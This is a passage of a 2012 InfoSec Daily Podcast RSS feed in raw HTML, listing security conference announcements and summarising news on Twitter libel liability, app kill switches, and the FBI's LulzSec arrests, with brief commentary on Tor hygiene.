	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.zdnet.com/blog/london/twitter-could-be-sued-for-its-users-unlawful-tweets/3293?tag=nl.e550"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/london/twitter-could-be-sued-for-its-users-unlawful-tweets/3293?tag=nl.e550</span></a></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If a Twitter user posts an illegal tweet, they could get sued, but Twitter could be sued itself as a secondary publisher according to Zack Whittaker. Legal analysis site Out-Law published a very interesting, theoretical piece, which describes how Twitter could fall foul of the law through no apparent fault of its own but by giving its users free reign over what they say.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A case of mistaken identity in Australia illustrates the point. Someone wrote a hateful blog about writer and television personality Marieke Hardy. She wrote a blog post accusing Joshua Meggitt of being its author and used her Twitter account to draw attention to her post.Hardy was wrong to finger Meggitt as the author of the original material and she reportedly paid Au$15,000 (&pound;10,000) to settle the case. Will Twitter still be held liable for the libel?</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://thehackernews.com/2012/03/killswitch-they-can-remotely-modify.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2012/03/killswitch-they-can-remotely-modify.html</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last year,a Finnish software developer, was cruising Google&rsquo;s Android Market for smartphone apps last year when he noticed something strange. Dozens of best-selling applications suddenly listed the same wrong publisher. Google uses a little known kill switch, to forcibly removing the malicious code from more than 250,000 infected Android smartphones. It&rsquo;s a powerful way to stop threats that spread quickly, but it&rsquo;s also a privacy and security land mine.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With the rollout of the Windows 8 operating system expected later this year, millions of desktop and laptop PCs will get kill switches for the first time. Microsoft has confirmed that they have remote kill switch installed in to Windows 8 apps. using this access, they can disable and even remove an app entirely from a user&rsquo;s device. This piece of information was released along with other details of the upcoming Windows Store for Windows 8.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/tech-policy/news/2012/03/report-lulzsec-leader-sabu-worked-with-fbi-since-last-summer.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/03/report-lulzsec-leader-sabu-worked-with-fbi-since-last-summer.ars</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://www.foxnews.com/scitech/2012/03/06/exclusive-inside-lulzsec-mastermind-turns-on-his-minions/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.foxnews.com/scitech/2012/03/06/exclusive-inside-lulzsec-mastermind-turns-on-his-minions/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://www.foxnews.com/scitech/2012/03/06/exclusive-unmasking-worlds-most-wanted-hacker/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.foxnews.com/scitech/2012/03/06/exclusive-unmasking-worlds-most-wanted-hacker/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They caught him because just once, he logged onto IRC without going through Tor, revealing to the FBI his IP address. This reveals a little bit about the FBI, namely that they&#39;ve infiltrated enough of the popular IRC relays to be able to get people&#39;s IP addresses. We&#39;ve always suspected they could, now we know.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is a good lesson for Tor users. Tor, itself, is not enough to keep your identity hidden. It &quot;fails open&quot;, which means that if you make a mistake, you&#39;ll expose your IP address. If &quot;they&quot; are coming after you, you need to configure a &quot;fail close&quot; network setup, such as by using a second machine as a transparent Tor proxy, such that everything is forced through Tor no matter what you do, and if the Tor service fails, your network connectivity also fails (fail close). </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Update</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Two commenters think I&#39;m criticizing Tor. I&#39;m not. It&#39;s like that fact that crypto isn&#39;t enough to keep your data private. The FBI cannot crack AES128, but if you&#39;ve chosen a poor password, they can crack that. It&#39;s not AES128&#39;s fault you chose a bad password. It&#39;s likewise not Tor&#39;s fault you bypassed it in order to log onto IRC. It&#39;s just that you should be aware of the importance of choosing good passwords, and practicing good Tor hygiene.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another lesson about the FBI is that this is how they always work. You don&#39;t expect arrests right away after a &nbsp;major hack. Instead, the FBI will plod along for a year infiltrating as much of the organization as they can, turning key members, gathering hard evidence, and THEN they swoop in and gather everyone up.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is mostly because hard evidence of past crimes is hard to get. You need evidence of future crimes. Once you&#39;ve infiltrated the organization and can monitor what they are doing in real time, you&#39;ll get evidence of the crimes as they are happening, evidence you couldn&#39;t get on their previous crimes.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And the evidence the FBI most wants is for things like &quot;conspiracy&quot; [most of those arrested today are indicted on</span><a href="http://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">conspiracy</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">]. Proving you committed a crime is hard, proving you conspired to commit it (by monitoring IRC) is pretty easy. Unless they find the stolen credit card numbers on your laptop, they&#39;ll find it difficult convicting you of cybercrime. But they can convict you of conspiracy, intent, obstruction of of justice, racketeering, and so on. For example, the Palin hacker was convicted of only misdemeanor hacking, but felony obstruction of justice because he deleted evidence of the hack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When your little group has done something really bad, and you realize you&#39;ve gotten over your head and the the FBI is coming after you, you have the prisoner&#39;s dilemma to consider. The first one of you that cracks and helps the FBI track everyone else down will get the sweetheart deal, and everyone else will go to jail. I can&#39;t see myself doing this, but at the same time, I can&#39;t see myself getting involved in such cybercrime.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI has apparently turned &quot;Sabu,&quot; was the mastermind behind the pranksterish hacking group LulzSec, an Anonymous offshoot that went on a frenetic corporate hacking spree last summer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fox News has the story, from a law enforcement source, of how two FBI agents climbed the stairs to a sixth-floor apartment last summer in New York public housing and found 28-year old Hector Monsegur, the unemployed man behind the name &quot;Sabu.&quot; Worried about the two children in his charge, Monsegur has allegedly been aiding the FBI since his arrest last summer&mdash;aid which culminated in arrests today of several LulzSec members in the US and UK.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Monsegur&#39;s federal court docket has been sealed until this morning. The documents themselves aren&#39;t yet available, but the docket indicates that he was arrested on June 7, 2011 and the next day was released on $50,000 bail. &quot;Deft to be supervised by the FBI with respect to travel and reporting and all other issues,&quot; noted the court.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-612-illegal-tweets-kill-switch-for-8-and-sabu-the-fed/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3594/0/infosec-daily-podcast-episode-612.mp3" length="15526434" type="audio/mpeg" />
		<itunes:duration>0:32:18</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 612 for March 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Bl[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 612 for March 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.zdnet.com/blog/london/twitter-could-be-sued-for-its-users-unlawful-tweets/3293?tag=nl.e550
If a Twitter user posts an illegal tweet, they could get sued, but Twitter could be sued itself as a secondary publisher according to Zack Whittaker. Legal analysis site Out-Law published a very interesting, theoretical piece, which describes how Twitter could fall foul of the law through no apparent fault of its own but by giving its users free reign over what they say.
&#160;
A case of mistaken identity in Australia illustrates the point. Someone wrote a hateful blog about writer and television personality Marieke Hardy. She wrote a blog post accusing Joshua Meggitt of being its author and used her Twitter account to draw attention to her post.Hardy was wrong to finger Meggitt as the author of the original material and she reportedly paid Au$15,000 (&#163;10,000) to settle the case. Will Twitter still be held liable for the libel?
&#8230;
	Source: http://thehackernews.com/2012/03/killswitch-they-can-remotely-modify.html
	&#160;
Last year,a Finnish software developer, was cruising Google&#8217;s Android Market for smartphone apps last year when he noticed something strange. Dozens of best-selling applications suddenly listed the same wrong publisher. Google uses a little known kill switch, to forcibly removing the malicious code from more than 250,000 infected Android smartphones. It&#8217;s a powerful way to stop threats that spread quickly, but it&#8217;s also a privacy and security land mine.
&#160;
With the rollout of the Windows 8 operating system expected later this year, millions of desktop and laptop PCs will get kill switches for the first time. Microsoft has confirmed that they have remote kill switch installed in to Windows 8 apps. using this access, they can disable and even remove an app entirely from a user&#8217;s device. This piece of information was released along with other details of the upcomin[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 611 &#8211; NASA Gets Pwned 13x, Apple &amp; Google on FTC Watch List and More Flash</title>
		<link>http://www.isdpodcast.com/episode-611-nasa-gets-pwned-13x-apple-google-on-ftc-watch-list-and-more-flash-2</link>
		<comments>http://www.isdpodcast.com/episode-611-nasa-gets-pwned-13x-apple-google-on-ftc-watch-list-and-more-flash-2#comments</comments>
		<pubDate>Tue, 06 Mar 2012 02:53:29 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3591</guid>
		<description><![CDATA[Episode 611 &#8211; NASA Gets Pwned 13x, Apple &#38; Google on FTC Watch List and More Flash InfoSec Daily Podcast Episode 611 for March 5, 2012. &#160;Tonight&#039;s podcast is hosted by Dave Kennedy and Boris Sverdlik Special guests: aricon and Spridel Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Episode 611 &#8211; NASA Gets Pwned 13x, Apple &amp; Google on FTC Watch List and More Flash</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 611 for March 5, 2012. &nbsp;Tonight&#039;s podcast is hosted by </span><span style="font-size: 13px;font-family: Verdana;vertical-align: baseline">Dave Kennedy and Boris Sverdlik</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Special guests: aricon and Spridel</span></p>
<p>	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">Announcements:</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Social Engineering Training</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Southwest</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">AIDE 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: MU Forensic Science Center</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">LayerOne 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></p>
<p>	</b></p>
<h5><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></h5>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> </span><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Defcon 20</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 26-29, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span>http://defcon.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></p>
